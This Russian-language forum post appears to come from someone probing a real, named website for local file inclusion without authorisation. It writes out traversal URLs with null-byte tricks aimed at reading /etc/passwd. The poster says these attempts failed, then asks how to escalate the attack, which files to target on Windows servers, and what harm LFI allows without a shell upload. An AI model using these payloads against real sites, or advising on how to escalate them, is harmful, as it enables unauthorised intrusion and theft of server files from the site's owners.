Всем привет
Имеется страничка
Код:
http://www.dirdim.com/port_featuredprojects.php?fileName=fp_usluge
название параметра запроса намекает на наличие на сайте LFI
пробую следующее:
Код:
http://www.dirdim.com/port_featuredprojects.php?fileName=./fp_usluge
страница успешно грузится
Код:
http://www.dirdim.com/port_featuredprojects.php?fileName=../fp_usluge
страница не грузится
что еще более намекает на наличие LFI
проверяю, что будет с %00
Код:
http://www.dirdim.com/port_featuredprojects.php?fileName=fp_usluge%00
страница не грузится, из чего делаю предположение о том, что параметр с чем-то конкатенируется
теперь пытаюсь заинклюдить /etc/passwd
Код:
http://www.dirdim.com/port_featuredprojects.php?fileName=etc/passwd%00
Код:
http://www.dirdim.com/port_featuredprojects.php?fileName=../etc/passwd%00
Код:
http://www.dirdim.com/port_featuredprojects.php?fileName=../../etc/passwd%00
и так далее
заинклюдить не удалось
в связи с этим несколько вопросов:
На сколько это похоже на LFI? Что такое может быть на сервере, из-за чего мне не удается подключить /etc/passwd? Как его можно раскрутить дальше?
Какие файлы вы пробуете инклюдить на windows серверах? Что потенциально опасного можно сделать с LFI, в том случае, если на сайте нет возможности залить шелл?
Заранее спасибо за ответы